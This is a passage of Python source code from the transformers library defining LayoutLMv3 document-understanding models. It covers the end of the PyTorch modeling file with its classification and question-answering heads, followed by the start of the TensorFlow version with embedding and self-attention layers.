embeddings = self.patch_embed(pixel_values)
# add [CLS] token
batch_size, seq_len, _ = embeddings.size()
cls_tokens = self.cls_token.expand(batch_size, -1, -1)
embeddings = torch.cat((cls_tokens, embeddings), dim=1)
# add position embeddings
if self.pos_embed is not None:
embeddings = embeddings + self.pos_embed
embeddings = self.pos_drop(embeddings)
embeddings = self.norm(embeddings)
return embeddings
@add_start_docstrings_to_model_forward(
LAYOUTLMV3_MODEL_INPUTS_DOCSTRING.format("batch_size, token_sequence_length")
)
@replace_return_docstrings(output_type=BaseModelOutput, config_class=_CONFIG_FOR_DOC)
def forward(
self,
input_ids: Optional[torch.LongTensor] = None,
bbox: Optional[torch.LongTensor] = None,
attention_mask: Optional[torch.FloatTensor] = None,
token_type_ids: Optional[torch.LongTensor] = None,
position_ids: Optional[torch.LongTensor] = None,
head_mask: Optional[torch.FloatTensor] = None,
inputs_embeds: Optional[torch.FloatTensor] = None,
pixel_values: Optional[torch.FloatTensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[Tuple, BaseModelOutput]:
r"""
Returns:
Examples:
```python
>>> from transformers import AutoProcessor, AutoModel
>>> from datasets import load_dataset
>>> processor = AutoProcessor.from_pretrained("microsoft/layoutlmv3-base", apply_ocr=False)
>>> model = AutoModel.from_pretrained("microsoft/layoutlmv3-base")
>>> dataset = load_dataset("nielsr/funsd-layoutlmv3", split="train")
>>> example = dataset[0]
>>> image = example["image"]
>>> words = example["tokens"]
>>> boxes = example["bboxes"]
>>> encoding = processor(image, words, boxes=boxes, return_tensors="pt")
>>> outputs = model(**encoding)
>>> last_hidden_states = outputs.last_hidden_state
```"""
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
if input_ids is not None:
input_shape = input_ids.size()
batch_size, seq_length = input_shape
device = input_ids.device
elif inputs_embeds is not None:
input_shape = inputs_embeds.size()[:-1]
batch_size, seq_length = input_shape
device = inputs_embeds.device
elif pixel_values is not None:
batch_size = len(pixel_values)
device = pixel_values.device
else:
raise ValueError("You have to specify either input_ids or inputs_embeds or pixel_values")
if input_ids is not None or inputs_embeds is not None:
if attention_mask is None:
attention_mask = torch.ones(((batch_size, seq_length)), device=device)
if token_type_ids is None:
token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=device)
if bbox is None:
bbox = torch.zeros(tuple(list(input_shape) + [4]), dtype=torch.long, device=device)
embedding_output = self.embeddings(
input_ids=input_ids,
bbox=bbox,
position_ids=position_ids,
token_type_ids=token_type_ids,
inputs_embeds=inputs_embeds,
)
final_bbox = final_position_ids = None
patch_height = patch_width = None
if pixel_values is not None:
patch_height, patch_width = int(pixel_values.shape[2] / self.config.patch_size), int(
pixel_values.shape[3] / self.config.patch_size
)
visual_embeddings = self.forward_image(pixel_values)
visual_attention_mask = torch.ones(
(batch_size, visual_embeddings.shape[1]), dtype=torch.long, device=device
)
if attention_mask is not None:
attention_mask = torch.cat([attention_mask, visual_attention_mask], dim=1)
else:
attention_mask = visual_attention_mask
if self.config.has_relative_attention_bias or self.config.has_spatial_attention_bias:
if self.config.has_spatial_attention_bias:
visual_bbox = self.calculate_visual_bbox(device, dtype=torch.long, batch_size=batch_size)
if bbox is not None:
final_bbox = torch.cat([bbox, visual_bbox], dim=1)
else:
final_bbox = visual_bbox
visual_position_ids = torch.arange(
0, visual_embeddings.shape[1], dtype=torch.long, device=device
).repeat(batch_size, 1)
if input_ids is not None or inputs_embeds is not None:
position_ids = torch.arange(0, input_shape[1], device=device).unsqueeze(0)
position_ids = position_ids.expand(input_shape)
final_position_ids = torch.cat([position_ids, visual_position_ids], dim=1)
else:
final_position_ids = visual_position_ids
if input_ids is not None or inputs_embeds is not None:
embedding_output = torch.cat([embedding_output, visual_embeddings], dim=1)
else:
embedding_output = visual_embeddings
embedding_output = self.LayerNorm(embedding_output)
embedding_output = self.dropout(embedding_output)
elif self.config.has_relative_attention_bias or self.config.has_spatial_attention_bias:
if self.config.has_spatial_attention_bias:
final_bbox = bbox
if self.config.has_relative_attention_bias:
position_ids = self.embeddings.position_ids[:, : input_shape[1]]
position_ids = position_ids.expand_as(input_ids)
final_position_ids = position_ids
extended_attention_mask: torch.Tensor = self.get_extended_attention_mask(
attention_mask, None, device, dtype=embedding_output.dtype
)
# Prepare head mask if needed
# 1.0 in head_mask indicate we keep the head
# attention_probs has shape bsz x n_heads x N x N
# input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
# and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]
head_mask = self.get_head_mask(head_mask, self.config.num_hidden_layers)
encoder_outputs = self.encoder(
embedding_output,
bbox=final_bbox,
position_ids=final_position_ids,
attention_mask=extended_attention_mask,
head_mask=head_mask,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
patch_height=patch_height,
patch_width=patch_width,
)
sequence_output = encoder_outputs[0]
if not return_dict:
return (sequence_output,) + encoder_outputs[1:]
return BaseModelOutput(
last_hidden_state=sequence_output,
hidden_states=encoder_outputs.hidden_states,
attentions=encoder_outputs.attentions,
)
class LayoutLMv3ClassificationHead(nn.Module):
"""
Head for sentence-level classification tasks. Reference: RobertaClassificationHead
"""
def __init__(self, config, pool_feature=False):
super().__init__()
self.pool_feature = pool_feature
if pool_feature:
self.dense = nn.Linear(config.hidden_size * 3, config.hidden_size)
else:
self.dense = nn.Linear(config.hidden_size, config.hidden_size)
classifier_dropout = (
config.classifier_dropout if config.classifier_dropout is not None else config.hidden_dropout_prob
)
self.dropout = nn.Dropout(classifier_dropout)
self.out_proj = nn.Linear(config.hidden_size, config.num_labels)
def forward(self, x):
x = self.dropout(x)
x = self.dense(x)
x = torch.tanh(x)
x = self.dropout(x)
x = self.out_proj(x)
return x
@add_start_docstrings(
"""
LayoutLMv3 Model with a token classification head on top (a linear layer on top of the final hidden states) e.g.
for sequence labeling (information extraction) tasks such as [FUNSD](https://guillaumejaume.github.io/FUNSD/),
[SROIE](https://rrc.cvc.uab.es/?ch=13), [CORD](https://github.com/clovaai/cord) and
[Kleister-NDA](https://github.com/applicaai/kleister-nda).
""",
LAYOUTLMV3_START_DOCSTRING,
)
class LayoutLMv3ForTokenClassification(LayoutLMv3PreTrainedModel):
_keys_to_ignore_on_load_unexpected = [r"pooler"]
_keys_to_ignore_on_load_missing = [r"position_ids"]
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
self.layoutlmv3 = LayoutLMv3Model(config)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
if config.num_labels < 10:
self.classifier = nn.Linear(config.hidden_size, config.num_labels)
else:
self.classifier = LayoutLMv3ClassificationHead(config, pool_feature=False)
self.init_weights()
@add_start_docstrings_to_model_forward(
LAYOUTLMV3_DOWNSTREAM_INPUTS_DOCSTRING.format("batch_size, sequence_length")
)
@replace_return_docstrings(output_type=TokenClassifierOutput, config_class=_CONFIG_FOR_DOC)
def forward(
self,
input_ids: Optional[torch.LongTensor] = None,
bbox: Optional[torch.LongTensor] = None,
attention_mask: Optional[torch.FloatTensor] = None,
token_type_ids: Optional[torch.LongTensor] = None,
position_ids: Optional[torch.LongTensor] = None,
head_mask: Optional[torch.FloatTensor] = None,
inputs_embeds: Optional[torch.FloatTensor] = None,
labels: Optional[torch.LongTensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
pixel_values: Optional[torch.LongTensor] = None,
) -> Union[Tuple, TokenClassifierOutput]:
r"""
labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
Labels for computing the token classification loss. Indices should be in `[0, ..., config.num_labels - 1]`.
Returns:
Examples:
```python
>>> from transformers import AutoProcessor, AutoModelForTokenClassification
>>> from datasets import load_dataset
>>> processor = AutoProcessor.from_pretrained("microsoft/layoutlmv3-base", apply_ocr=False)
>>> model = AutoModelForTokenClassification.from_pretrained("microsoft/layoutlmv3-base", num_labels=7)
>>> dataset = load_dataset("nielsr/funsd-layoutlmv3", split="train")
>>> example = dataset[0]
>>> image = example["image"]
>>> words = example["tokens"]
>>> boxes = example["bboxes"]
>>> word_labels = example["ner_tags"]
>>> encoding = processor(image, words, boxes=boxes, word_labels=word_labels, return_tensors="pt")
>>> outputs = model(**encoding)
>>> loss = outputs.loss
>>> logits = outputs.logits
```"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.layoutlmv3(
input_ids,
bbox=bbox,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
pixel_values=pixel_values,
)
if input_ids is not None:
input_shape = input_ids.size()
else:
input_shape = inputs_embeds.size()[:-1]
seq_length = input_shape[1]
# only take the text part of the output representations
sequence_output = outputs[0][:, :seq_length]
sequence_output = self.dropout(sequence_output)
logits = self.classifier(sequence_output)
loss = None
if labels is not None:
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
if not return_dict:
output = (logits,) + outputs[1:]
return ((loss,) + output) if loss is not None else output
return TokenClassifierOutput(
loss=loss,
logits=logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
@add_start_docstrings(
"""
LayoutLMv3 Model with a span classification head on top for extractive question-answering tasks such as
[DocVQA](https://rrc.cvc.uab.es/?ch=17) (a linear layer on top of the text part of the hidden-states output to
compute `span start logits` and `span end logits`).
""",
LAYOUTLMV3_START_DOCSTRING,
)
class LayoutLMv3ForQuestionAnswering(LayoutLMv3PreTrainedModel):
_keys_to_ignore_on_load_unexpected = [r"pooler"]
_keys_to_ignore_on_load_missing = [r"position_ids"]
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
self.layoutlmv3 = LayoutLMv3Model(config)
self.qa_outputs = LayoutLMv3ClassificationHead(config, pool_feature=False)
self.init_weights()
@add_start_docstrings_to_model_forward(
LAYOUTLMV3_DOWNSTREAM_INPUTS_DOCSTRING.format("batch_size, sequence_length")
)
@replace_return_docstrings(output_type=QuestionAnsweringModelOutput, config_class=_CONFIG_FOR_DOC)
def forward(
self,
input_ids: Optional[torch.LongTensor] = None,
attention_mask: Optional[torch.FloatTensor] = None,
token_type_ids: Optional[torch.LongTensor] = None,
position_ids: Optional[torch.LongTensor] = None,
head_mask: Optional[torch.FloatTensor] = None,
inputs_embeds: Optional[torch.FloatTensor] = None,
start_positions: Optional[torch.LongTensor] = None,
end_positions: Optional[torch.LongTensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
bbox: Optional[torch.LongTensor] = None,
pixel_values: Optional[torch.LongTensor] = None,
) -> Union[Tuple, QuestionAnsweringModelOutput]:
r"""
start_positions (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
Labels for position (index) of the start of the labelled span for computing the token classification loss.
Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence
are not taken into account for computing the loss.
end_positions (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
Labels for position (index) of the end of the labelled span for computing the token classification loss.
Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence
are not taken into account for computing the loss.
Returns:
Examples:
```python
>>> from transformers import AutoProcessor, AutoModelForQuestionAnswering
>>> from datasets import load_dataset
>>> import torch
>>> processor = AutoProcessor.from_pretrained("microsoft/layoutlmv3-base", apply_ocr=False)
>>> model = AutoModelForQuestionAnswering.from_pretrained("microsoft/layoutlmv3-base")
>>> dataset = load_dataset("nielsr/funsd-layoutlmv3", split="train")
>>> example = dataset[0]
>>> image = example["image"]
>>> question = "what's his name?"
>>> words = example["tokens"]
>>> boxes = example["bboxes"]
>>> encoding = processor(image, question, words, boxes=boxes, return_tensors="pt")
>>> start_positions = torch.tensor([1])
>>> end_positions = torch.tensor([3])
>>> outputs = model(**encoding, start_positions=start_positions, end_positions=end_positions)
>>> loss = outputs.loss
>>> start_scores = outputs.start_logits
>>> end_scores = outputs.end_logits
```"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.layoutlmv3(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
bbox=bbox,
pixel_values=pixel_values,
)
sequence_output = outputs[0]
logits = self.qa_outputs(sequence_output)
start_logits, end_logits = logits.split(1, dim=-1)
start_logits = start_logits.squeeze(-1).contiguous()
end_logits = end_logits.squeeze(-1).contiguous()
total_loss = None
if start_positions is not None and end_positions is not None:
# If we are on multi-GPU, split add a dimension
if len(start_positions.size()) > 1:
start_positions = start_positions.squeeze(-1)
if len(end_positions.size()) > 1:
end_positions = end_positions.squeeze(-1)
# sometimes the start/end positions are outside our model inputs, we ignore these terms
ignored_index = start_logits.size(1)
start_positions = start_positions.clamp(0, ignored_index)
end_positions = end_positions.clamp(0, ignored_index)
loss_fct = CrossEntropyLoss(ignore_index=ignored_index)
start_loss = loss_fct(start_logits, start_positions)
end_loss = loss_fct(end_logits, end_positions)
total_loss = (start_loss + end_loss) / 2
if not return_dict:
output = (start_logits, end_logits) + outputs[1:]
return ((total_loss,) + output) if total_loss is not None else output
return QuestionAnsweringModelOutput(
loss=total_loss,
start_logits=start_logits,
end_logits=end_logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
@add_start_docstrings(
"""
LayoutLMv3 Model with a sequence classification head on top (a linear layer on top of the final hidden state of the
[CLS] token) e.g. for document image classification tasks such as the
[RVL-CDIP](https://www.cs.cmu.edu/~aharley/rvl-cdip/) dataset.
""",
LAYOUTLMV3_START_DOCSTRING,
)
class LayoutLMv3ForSequenceClassification(LayoutLMv3PreTrainedModel):
_keys_to_ignore_on_load_missing = [r"position_ids"]
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
self.config = config
self.layoutlmv3 = LayoutLMv3Model(config)
self.classifier = LayoutLMv3ClassificationHead(config, pool_feature=False)
self.init_weights()
@add_start_docstrings_to_model_forward(
LAYOUTLMV3_DOWNSTREAM_INPUTS_DOCSTRING.format("batch_size, sequence_length")
)
@replace_return_docstrings(output_type=SequenceClassifierOutput, config_class=_CONFIG_FOR_DOC)
def forward(
self,
input_ids: Optional[torch.LongTensor] = None,
attention_mask: Optional[torch.FloatTensor] = None,
token_type_ids: Optional[torch.LongTensor] = None,
position_ids: Optional[torch.LongTensor] = None,
head_mask: Optional[torch.FloatTensor] = None,
inputs_embeds: Optional[torch.FloatTensor] = None,
labels: Optional[torch.LongTensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
bbox: Optional[torch.LongTensor] = None,
pixel_values: Optional[torch.LongTensor] = None,
) -> Union[Tuple, SequenceClassifierOutput]:
"""
Returns:
Examples:
```python
>>> from transformers import AutoProcessor, AutoModelForSequenceClassification
>>> from datasets import load_dataset
>>> import torch
>>> processor = AutoProcessor.from_pretrained("microsoft/layoutlmv3-base", apply_ocr=False)
>>> model = AutoModelForSequenceClassification.from_pretrained("microsoft/layoutlmv3-base")
>>> dataset = load_dataset("nielsr/funsd-layoutlmv3", split="train")
>>> example = dataset[0]
>>> image = example["image"]
>>> words = example["tokens"]
>>> boxes = example["bboxes"]
>>> encoding = processor(image, words, boxes=boxes, return_tensors="pt")
>>> sequence_label = torch.tensor([1])
>>> outputs = model(**encoding, labels=sequence_label)
>>> loss = outputs.loss
>>> logits = outputs.logits
```"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.layoutlmv3(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
bbox=bbox,
pixel_values=pixel_values,
)
sequence_output = outputs[0][:, 0, :]
logits = self.classifier(sequence_output)
loss = None
if labels is not None:
if self.config.problem_type is None:
if self.num_labels == 1:
self.config.problem_type = "regression"
elif self.num_labels > 1 and (labels.dtype == torch.long or labels.dtype == torch.int):
self.config.problem_type = "single_label_classification"
else:
self.config.problem_type = "multi_label_classification"
if self.config.problem_type == "regression":
loss_fct = MSELoss()
if self.num_labels == 1:
loss = loss_fct(logits.squeeze(), labels.squeeze())
else:
loss = loss_fct(logits, labels)
elif self.config.problem_type == "single_label_classification":
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
elif self.config.problem_type == "multi_label_classification":
loss_fct = BCEWithLogitsLoss()
loss = loss_fct(logits, labels)
if not return_dict:
output = (logits,) + outputs[1:]
return ((loss,) + output) if loss is not None else output
return SequenceClassifierOutput(
loss=loss,
logits=logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 71,537 | src/transformers/models/layoutlmv3/modeling_tf_layoutlmv3.py | # coding=utf-8
# Copyright 2022 Microsoft Research and The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""TF 2.0 LayoutLMv3 model."""
import collections
import math
from typing import Dict, List, Optional, Tuple, Union
import tensorflow as tf
from ...activations_tf import get_tf_activation
from ...modeling_tf_outputs import (
TFBaseModelOutput,
TFQuestionAnsweringModelOutput,
TFSequenceClassifierOutput,
TFTokenClassifierOutput,
)
from ...modeling_tf_utils import (
TFPreTrainedModel,
TFQuestionAnsweringLoss,
TFSequenceClassificationLoss,
TFTokenClassificationLoss,
get_initializer,
keras_serializable,
unpack_inputs,
)
from ...utils import add_start_docstrings, add_start_docstrings_to_model_forward, replace_return_docstrings
from .configuration_layoutlmv3 import LayoutLMv3Config
_CONFIG_FOR_DOC = "LayoutLMv3Config"
_DUMMY_INPUT_IDS = [
[7, 6, 1],
[1, 2, 0],
]
_DUMMY_BBOX = [
[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
[[13, 14, 15, 16], [17, 18, 19, 20], [21, 22, 23, 24]],
]
TF_LAYOUTLMV3_PRETRAINED_MODEL_ARCHIVE_LIST = [
"microsoft/layoutlmv3-base",
"microsoft/layoutlmv3-large",
# See all LayoutLMv3 models at https://huggingface.co/models?filter=layoutlmv3
]
LARGE_NEGATIVE = -1e8
class TFLayoutLMv3PatchEmbeddings(tf.keras.layers.Layer):
"""LayoutLMv3 image (patch) embeddings."""
def __init__(self, config: LayoutLMv3Config, **kwargs):
super().__init__(**kwargs)
patch_sizes = (
config.patch_size
if isinstance(config.patch_size, collections.abc.Iterable)
else (config.patch_size, config.patch_size)
)
self.proj = tf.keras.layers.Conv2D(
filters=config.hidden_size,
kernel_size=patch_sizes,
strides=patch_sizes,
padding="valid",
data_format="channels_last",
use_bias=True,
kernel_initializer=get_initializer(config.initializer_range),
name="proj",
)
self.hidden_size = config.hidden_size
self.num_patches = (config.input_size**2) // (patch_sizes[0] * patch_sizes[1])
def call(self, pixel_values: tf.Tensor) -> tf.Tensor:
# When running on CPU, `tf.keras.layers.Conv2D` doesn't support `NCHW` format.
# So change the input format from `NCHW` to `NHWC`.
pixel_values = tf.transpose(pixel_values, perm=[0, 2, 3, 1])
embeddings = self.proj(pixel_values)
embeddings = tf.reshape(embeddings, (-1, self.num_patches, self.hidden_size))
return embeddings
class TFLayoutLMv3TextEmbeddings(tf.keras.layers.Layer):
"""
LayoutLMv3 text embeddings. Same as `RobertaEmbeddings` but with added spatial (layout) embeddings.
"""
def __init__(self, config: LayoutLMv3Config, **kwargs):
super().__init__(**kwargs)
self.word_embeddings = tf.keras.layers.Embedding(
config.vocab_size,
config.hidden_size,
embeddings_initializer=get_initializer(config.initializer_range),
name="word_embeddings",
)
self.token_type_embeddings = tf.keras.layers.Embedding(
config.type_vocab_size,
config.hidden_size,
embeddings_initializer=get_initializer(config.initializer_range),
name="token_type_embeddings",
)
self.LayerNorm = tf.keras.layers.LayerNormalization(epsilon=config.layer_norm_eps, name="LayerNorm")
self.dropout = tf.keras.layers.Dropout(config.hidden_dropout_prob)
self.padding_token_index = config.pad_token_id
self.position_embeddings = tf.keras.layers.Embedding(
config.max_position_embeddings,
config.hidden_size,
embeddings_initializer=get_initializer(config.initializer_range),
name="position_embeddings",
)
self.x_position_embeddings = tf.keras.layers.Embedding(
config.max_2d_position_embeddings,
config.coordinate_size,
embeddings_initializer=get_initializer(config.initializer_range),
name="x_position_embeddings",
)
self.y_position_embeddings = tf.keras.layers.Embedding(
config.max_2d_position_embeddings,
config.coordinate_size,
embeddings_initializer=get_initializer(config.initializer_range),
name="y_position_embeddings",
)
self.h_position_embeddings = tf.keras.layers.Embedding(
config.max_2d_position_embeddings,
config.shape_size,
embeddings_initializer=get_initializer(config.initializer_range),
name="h_position_embeddings",
)
self.w_position_embeddings = tf.keras.layers.Embedding(
config.max_2d_position_embeddings,
config.shape_size,
embeddings_initializer=get_initializer(config.initializer_range),
name="w_position_embeddings",
)
self.max_2d_positions = config.max_2d_position_embeddings
def calculate_spatial_position_embeddings(self, bbox: tf.Tensor) -> tf.Tensor:
try:
left_position_ids = bbox[:, :, 0]
upper_position_ids = bbox[:, :, 1]
right_position_ids = bbox[:, :, 2]
lower_position_ids = bbox[:, :, 3]
except IndexError as exception:
raise IndexError("Bounding box is not of shape (batch_size, seq_length, 4).") from exception
try:
left_position_embeddings = self.x_position_embeddings(left_position_ids)
upper_position_embeddings = self.y_position_embeddings(upper_position_ids)
right_position_embeddings = self.x_position_embeddings(right_position_ids)
lower_position_embeddings = self.y_position_embeddings(lower_position_ids)
except IndexError as exception:
raise IndexError(
f"The `bbox` coordinate values should be within 0-{self.max_2d_positions} range."
) from exception
max_position_id = self.max_2d_positions - 1
h_position_embeddings = self.h_position_embeddings(
tf.clip_by_value(bbox[:, :, 3] - bbox[:, :, 1], 0, max_position_id)
)
w_position_embeddings = self.w_position_embeddings(
tf.clip_by_value(bbox[:, :, 2] - bbox[:, :, 0], 0, max_position_id)
)
# LayoutLMv1 sums the spatial embeddings, but LayoutLMv3 concatenates them.
spatial_position_embeddings = tf.concat(
[
left_position_embeddings,
upper_position_embeddings,
right_position_embeddings,
lower_position_embeddings,
h_position_embeddings,
w_position_embeddings,
],
axis=-1,
)
return spatial_position_embeddings
def create_position_ids_from_inputs_embeds(self, inputs_embds: tf.Tensor) -> tf.Tensor:
"""
We are provided embeddings directly. We cannot infer which are padded, so just generate sequential position
ids.
"""
input_shape = tf.shape(inputs_embds)
sequence_length = input_shape[1]
start_index = self.padding_token_index + 1
end_index = self.padding_token_index + sequence_length + 1
position_ids = tf.range(start_index, end_index, dtype=tf.int32)
batch_size = input_shape[0]
position_ids = tf.reshape(position_ids, (1, sequence_length))
position_ids = tf.tile(position_ids, (batch_size, 1))
return position_ids
def create_position_ids_from_input_ids(self, input_ids: tf.Tensor) -> tf.Tensor:
"""
Replace non-padding symbols with their position numbers. Position numbers begin at padding_token_index + 1.
"""
mask = tf.cast(tf.not_equal(input_ids, self.padding_token_index), input_ids.dtype)
position_ids = tf.cumsum(mask, axis=1) * mask
position_ids = position_ids + self.padding_token_index
return position_ids
def create_position_ids(self, input_ids: tf.Tensor, inputs_embeds: tf.Tensor) -> tf.Tensor:
if input_ids is None:
return self.create_position_ids_from_inputs_embeds(inputs_embeds)
else:
return self.create_position_ids_from_input_ids(input_ids)
def call(
self,
input_ids: Optional[tf.Tensor] = None,
bbox: tf.Tensor = None,
token_type_ids: Optional[tf.Tensor] = None,
position_ids: Optional[tf.Tensor] = None,
inputs_embeds: Optional[tf.Tensor] = None,
training: bool = False,
) -> tf.Tensor:
if position_ids is None:
position_ids = self.create_position_ids(input_ids, inputs_embeds)
if input_ids is not None:
input_shape = tf.shape(input_ids)
else:
input_shape = tf.shape(inputs_embeds)[:-1]
if token_type_ids is None:
token_type_ids = tf.zeros(input_shape, dtype=position_ids.dtype)
if inputs_embeds is None:
# Note: tf.gather, on which the embedding layer is based, won't check positive out of bound
# indices on GPU, returning zeros instead. This is a dangerous silent behavior.
tf.debugging.assert_less(
input_ids,
tf.cast(self.word_embeddings.input_dim, dtype=input_ids.dtype),
message=(
"input_ids must be smaller than the embedding layer's input dimension (got"
f" {tf.math.reduce_max(input_ids)} >= {self.word_embeddings.input_dim})"
),
)
inputs_embeds = self.word_embeddings(input_ids)
token_type_embeddings = self.token_type_embeddings(token_type_ids)
embeddings = inputs_embeds + token_type_embeddings
position_embeddings = self.position_embeddings(position_ids)
embeddings += position_embeddings
spatial_position_embeddings = self.calculate_spatial_position_embeddings(bbox)
embeddings += spatial_position_embeddings
embeddings = self.LayerNorm(embeddings)
embeddings = self.dropout(embeddings, training=training)
return embeddings
class TFLayoutLMv3SelfAttention(tf.keras.layers.Layer):
def __init__(self, config: LayoutLMv3Config, **kwargs):
super().__init__(**kwargs)
if config.hidden_size % config.num_attention_heads != 0:
raise ValueError(
f"The hidden size ({config.hidden_size}) is not a multiple of the number of attention "
f"heads ({config.num_attention_heads})"
)
self.num_attention_heads = config.num_attention_heads
self.attention_head_size = int(config.hidden_size / config.num_attention_heads)
self.all_head_size = self.num_attention_heads * self.attention_head_size
self.attention_score_normaliser = math.sqrt(self.attention_head_size)
self.query = tf.keras.layers.Dense(
self.all_head_size,
kernel_initializer=get_initializer(config.initializer_range),
name="query",
)
self.key = tf.keras.layers.Dense(
self.all_head_size,
kernel_initializer=get_initializer(config.initializer_range),
name="key",
)
self.value = tf.keras.layers.Dense(
self.all_head_size,
kernel_initializer=get_initializer(config.initializer_range),
name="value",
)
self.dropout = tf.keras.layers.Dropout(config.attention_probs_dropout_prob)
self.has_relative_attention_bias = config.has_relative_attention_bias
self.has_spatial_attention_bias = config.has_spatial_attention_bias
def transpose_for_scores(self, x: tf.Tensor):
shape = tf.shape(x)
new_shape = (
shape[0], # batch_size
shape[1], # seq_length
self.num_attention_heads,
self.attention_head_size,
)
x = tf.reshape(x, new_shape)
return tf.transpose(x, perm=[0, 2, 1, 3]) # batch_size, num_heads, seq_length, attention_head_size
def cogview_attention(self, attention_scores: tf.Tensor, alpha: Union[float, int] = 32):
"""
https://arxiv.org/abs/2105.13290 Section 2.4 Stabilization of training: Precision Bottleneck Relaxation
(PB-Relax). A replacement of the original tf.keras.layers.Softmax(axis=-1)(attention_scores). Seems the new
attention_probs will result in a slower speed and a little bias. Can use
tf.debugging.assert_near(standard_attention_probs, cogview_attention_probs, atol=1e-08) for comparison. The
smaller atol (e.g., 1e-08), the better.
"""
scaled_attention_scores = attention_scores / alpha
max_value = tf.expand_dims(tf.reduce_max(scaled_attention_scores, axis=-1), axis=-1)
new_attention_scores = (scaled_attention_scores - max_value) * alpha
return tf.math.softmax(new_attention_scores, axis=-1)
def call(
self,
hidden_states: tf.Tensor,
attention_mask: Optional[tf.Tensor],
head_mask: Optional[tf.Tensor],
output_attentions: bool,
rel_pos: Optional[tf.Tensor] = None,
rel_2d_pos: Optional[tf.Tensor] = None,
training: bool = False,
) -> Union[Tuple[tf.Tensor], Tuple[tf.Tensor, tf.Tensor]]:
key_layer = self.transpose_for_scores(self.key(hidden_states))
value_layer = self.transpose_for_scores(self.value(hidden_states))
query_layer = self.transpose_for_scores(self.query(hidden_states))
# Take the dot product between "query" and "key" to get the raw attention scores.
normalised_query_layer = query_layer / self.attention_score_normaliser
transposed_key_layer = tf.transpose(
key_layer, perm=[0, 1, 3, 2]
) # batch_size, num_heads, attention_head_size, seq_length
attention_scores = tf.matmul(normalised_query_layer, transposed_key_layer)
if self.has_relative_attention_bias and self.has_spatial_attention_bias:
attention_scores += (rel_pos + rel_2d_pos) / self.attention_score_normaliser
elif self.has_relative_attention_bias:
attention_scores += rel_pos / self.attention_score_normaliser
if attention_mask is not None:
# Apply the attention mask (is precomputed for all layers in TFLayoutLMv3Model call() function)
attention_scores += attention_mask
# Normalize the attention scores to probabilities.
# Use the trick of CogView paper to stabilize training.
attention_probs = self.cogview_attention(attention_scores)
attention_probs = self.dropout(attention_probs, training=training)
# Mask heads if we want to.
if head_mask is not None:
attention_probs = attention_probs * head_mask
context_layer = tf.matmul(attention_probs, value_layer)
context_layer = tf.transpose(
context_layer, perm=[0, 2, 1, 3]
) # batch_size, seq_length, num_heads, attention_head_size
shape = tf.shape(context_layer)
context_layer = tf.reshape(
context_layer, (shape[0], shape[1], self.all_head_size)
) # batch_size, seq_length, num_heads * attention_head_size
outputs = (context_layer, attention_probs) if output_attentions else (context_layer,)
return outputs
# Copied from models.roberta.modeling_tf_roberta.TFRobertaSelfOutput
class TFLayoutLMv3SelfOutput(tf.keras.layers.Layer):
def __init__(self, config: LayoutLMv3Config, **kwargs):
super().__init__(**kwargs)
self.dense = tf.keras.layers.Dense(
units=config.hidden_size, kernel_initializer=get_initializer(config.initializer_range), name="dense"
)
self.LayerNorm = tf.keras.layers.LayerNormalization(epsilon=config.layer_norm_eps, name="LayerNorm")
self.dropout = tf.keras.layers.Dropout(rate=config.hidden_dropout_prob)
def call(self, hidden_states: tf.Tensor, input_tensor: tf.Tensor, training: bool = False) -> tf.Tensor:
hidden_states = self.dense(inputs=hidden_states)
